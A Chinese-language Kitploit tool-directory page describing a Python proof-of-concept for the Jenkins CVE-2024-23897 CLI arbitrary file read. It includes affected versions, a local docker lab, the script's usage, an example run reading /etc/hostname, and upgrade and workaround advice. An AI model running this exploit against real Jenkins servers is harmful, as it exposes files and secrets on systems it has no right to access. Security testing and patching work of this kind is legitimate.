Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Jenkins-CVE-2024-23897 — 针对Jenkins CVE-2024-23897的Python概念验证,通过CLI实现任意文件读取,暴露了未认证的文件泄露,并提供了多种利用方法。 | Kitploit
工具/GitHubGitHub/abraxa5/jenkins-cve-2024-23897
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试红队
GitHubabraxa5/jenkins-cve-2024-23897

Jenkins-CVE-2024-23897

针对Jenkins CVE-2024-23897的Python概念验证,通过CLI实现任意文件读取,暴露了未认证的文件泄露,并提供了多种利用方法。

查看仓库
1112年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

Jenkins CVE-2024-23897 PoC

一个针对 CVE-2024-23897 的概念验证(PoC)代码,该漏洞是 Jenkins 内置命令行界面(CLI)中的任意文件读取漏洞。它允许拥有 Overall/Read 权限的未认证攻击者读取 Jenkins 控制器文件系统上的任意文件。

受影响版本

  • Jenkins 版本 <= 2.441
  • Jenkins LTS 版本 <= 2.426.2

搭建一个易受攻击的实例

使用 docker compose 启动一个本地易受攻击的实例:

root@kitploit:~
cd docker
docker compose up -d

该实例将在 http://localhost:1234 可用

利用

root@kitploit:~
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 文件读取 PoC

options:
  -h, --help        显示此帮助信息并退出
  --url URL         Jenkins 实例的 URL(默认:http://localhost:1234)
  --file FILE       要读取的文件(默认:/etc/hostname)
  --method {1,2,3}  使用的方法 [connect-node(1), who-am-i(2), 或 help(3)](默认:1)

示例

root@kitploit:~
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

由于并发和连接超时,脚本在读取较大文件时可能会出现问题。更多技术细节和漏洞讲解,请参阅我的关于该主题的博客文章。

修复

  • 升级到 Jenkins 2.442 或 LTS 2.426.3
  • 按照 Jenkins 安全公告 中的描述应用临时变通措施。

相关链接

  • Sonar Source | 过度展开:揭露 Jenkins 中的关键安全漏洞
  • Jenkins 安全公告 - 2024-01-24
  • Qualys ThreatPROTECT | Jenkins Core 远程代码执行漏洞 (CVE-2024-23897)
  • CVE-2024-23897:评估 Jenkins 任意文件泄露漏洞的影响 – Horizon3.ai
下载工具